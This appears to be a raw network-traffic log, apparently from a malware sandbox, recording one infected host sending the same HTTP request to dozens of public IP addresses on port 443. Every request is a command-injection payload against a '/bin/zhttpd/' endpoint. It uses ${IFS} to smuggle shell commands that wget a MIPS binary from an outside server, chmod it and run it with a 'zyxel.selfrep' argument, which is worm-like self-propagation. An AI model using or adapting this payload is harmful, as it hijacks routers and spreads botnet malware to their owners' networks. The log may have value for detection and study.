                                                        Jan 28, 2024 10:13:05.661221981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7769192.168.2.1433550122.159.204.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661276102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7770192.168.2.1433960107.63.96.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661305904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7771192.168.2.144812041.115.6.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661339998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7772192.168.2.1446984206.148.241.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661375999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7773192.168.2.143289651.217.41.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661396980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7774192.168.2.1445984112.175.39.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661456108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7775192.168.2.1451254101.221.122.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661501884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7776192.168.2.145347492.193.140.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661520958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7777192.168.2.1444034105.254.34.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661573887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7778192.168.2.143787896.12.135.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661607981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7779192.168.2.145943660.247.7.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661664009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7780192.168.2.1455682158.120.53.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.661717892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7781192.168.2.143839852.219.86.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668735981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7782192.168.2.1447988116.119.185.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668765068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7783192.168.2.1446318157.196.243.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668818951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7784192.168.2.144335482.48.150.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668838978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7785192.168.2.1449232198.137.252.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668886900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7786192.168.2.1435204116.165.115.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668934107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7787192.168.2.1445918147.88.8.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668987989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7788192.168.2.14469129.197.4.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.668997049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7789192.168.2.1455018219.87.35.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669039011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7790192.168.2.144033492.79.55.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669085026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7791192.168.2.1451818183.43.23.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669106960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7792192.168.2.145641058.135.79.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669172049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7793192.168.2.1446522193.138.121.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669197083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7794192.168.2.144540432.171.8.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669200897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7795192.168.2.145612662.226.235.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669256926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7796192.168.2.144081839.140.235.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669256926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7797192.168.2.1452676170.63.165.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669256926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7798192.168.2.1454900120.130.233.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669321060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7799192.168.2.14506602.232.204.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669328928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7800192.168.2.1439106172.7.249.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669346094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7801192.168.2.1456330151.116.121.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669378996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7802192.168.2.143657643.141.28.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669437885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7803192.168.2.143528889.103.135.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669471025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7804192.168.2.144215292.121.254.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669540882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7805192.168.2.145440639.70.151.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669596910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7806192.168.2.144323060.251.212.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669605970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7807192.168.2.1448580167.91.245.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669661999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7808192.168.2.143280214.183.142.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669712067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7809192.168.2.1446326205.120.133.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669743061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7810192.168.2.143781262.22.225.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669785023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7811192.168.2.143304879.176.141.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669841051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7812192.168.2.1451602202.73.163.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669871092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7813192.168.2.1439464118.53.5.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669903040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7814192.168.2.1441206161.57.174.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669943094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7815192.168.2.143290498.156.14.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.669989109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7816192.168.2.1436154196.95.95.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670037985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7817192.168.2.1438950202.251.177.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670068979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7818192.168.2.1460544158.241.192.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670114994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7819192.168.2.1442804181.156.56.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670155048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7820192.168.2.1434754155.72.131.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670181990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7821192.168.2.1434442136.230.232.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670219898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7822192.168.2.1459424221.71.74.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670270920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7823192.168.2.1434506211.184.201.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670312881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7824192.168.2.1451338161.100.20.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670355082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7825192.168.2.1448572211.249.121.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670392990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7826192.168.2.1443404164.232.132.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670428038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7827192.168.2.1435104169.101.88.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670479059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7828192.168.2.144954663.245.50.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:06.670511961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7829192.168.2.1453336191.160.202.36443
                                                        TimestampBytes transferredDirectionData
